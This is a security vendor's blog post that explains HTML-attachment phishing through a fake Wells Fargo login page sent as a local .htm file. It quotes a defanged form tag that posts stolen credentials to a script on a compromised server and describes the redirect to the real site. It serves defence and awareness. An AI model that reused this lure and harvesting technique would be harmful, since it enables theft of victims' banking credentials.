HTML Attachment Phishing: What You Need to Know

Share Now


Are you aware of HTML attachment phishing? It is one of the latest trends with cybercriminals. Instead of emailing downloaders that contact C7C servers to download crypto malware, Troijans, or other nasties, HTML attachments are being sent. HTML phishing emails is less well known, and as a result, many people are falling for phishing scams.

Even though this past weekend was a holiday weekend for many, there is a good chance that you still checked your email fairly often. If you are like me, you typically use your phone or another mobile device to check your email on the go. This past weekend, you were probably multitasking and may not have been on high-alert for a fraudulent message while you were checking email in between hiding and finding Easter eggs.

Hackers know these things.

So, they send crafty messages like this one (shown as opened in the Thunderbird email client):

If you open that message on your phone, the attachment would probably download with the message, and all you have to do is click to view it. This is a little different than your typical phishing message; a typical phishing message contains a button that has an embedded link that takes you to a lookalike of your bank’s or another online service provider’s real web site.

In today’s example, the phishing page has been stored as a file that looks like the following in a desktop browser:

It will also load up in your phone’s browser, but Safari (or another browser) on your phone may just show you a truncated version of the Internet address you are visiting. When it is a local file, you may just see a portion of the name of the file, Wells_Fargo-Personal-Business_Banking.htm as on my iPhone below:

So, what can Wells Fargo do about that? You may think there is no phishing content to be taken down or removed because it seems encapsulated in the email message. You may think that nobody is harmed if you don’t reply or fall for logging in this way. However, some folks WILL reply, and there is fraudulent content on the Internet that can be referred by Wells Fargo to their takedown provider.

In the source code of the HTML attachment are instructions for how to handle the credentials that the victim enters. Below is a snippet of the code from this phishing attack:

<form id=”frmSignon” action=”hxxp://” autocomplete=”off” method=”post” name=”signon”>

The highlighted portion is the path to a PHP script on a compromised server in Portugal that hosts a domain belonging to a Brazilian gospel video web site. Undoubtedly, if we could view the source code of that PHP script, we would see that is contains the email address of the criminal who is receiving the stolen Wells Fargo credentials. Wells Fargo wants to remove this fraudulent content before its customers can be victimized.

When we visit that page, we see that the PHP code redirects victims to what we call the “exit URL” which is a legitimate login page at Wells Fargo. The victim will then think that their login failed, and they will try to log in again. It is at that moment that Wells Fargo can recognize that customers who login there—having been referred from the URL—are customers who likely just gave up their authentication credentials and should have their accounts locked until the situation is rectified.

PhishMe provides the intelligence that enables Wells Fargo and other spoofed brands tackle this threat vector. Our PhishMe Intelligence system scans over two million spam messages daily to identify the messages that are delivering HTML attachments. Then we use our patented technology to automatically identify the file as a phishing attack and extract the relevant intelligence.

PhishMe digs deeper than other threat intelligence service providers to find the source of the attacks.  Learn more about how we can help you protect your brand here


We use our own and third-party cookies to enhance your experience by showing you relevant content, personalizing our communications with you, and remembering your preferences when you visit our website. We also use them to improve the overall performance of our site. You can learn more about the cookies and similar technology we use by viewing our privacy policy. By clicking ‘Accept,’ you acknowledge and consent to our use of all cookies on our website.

This site is registered on as a development site.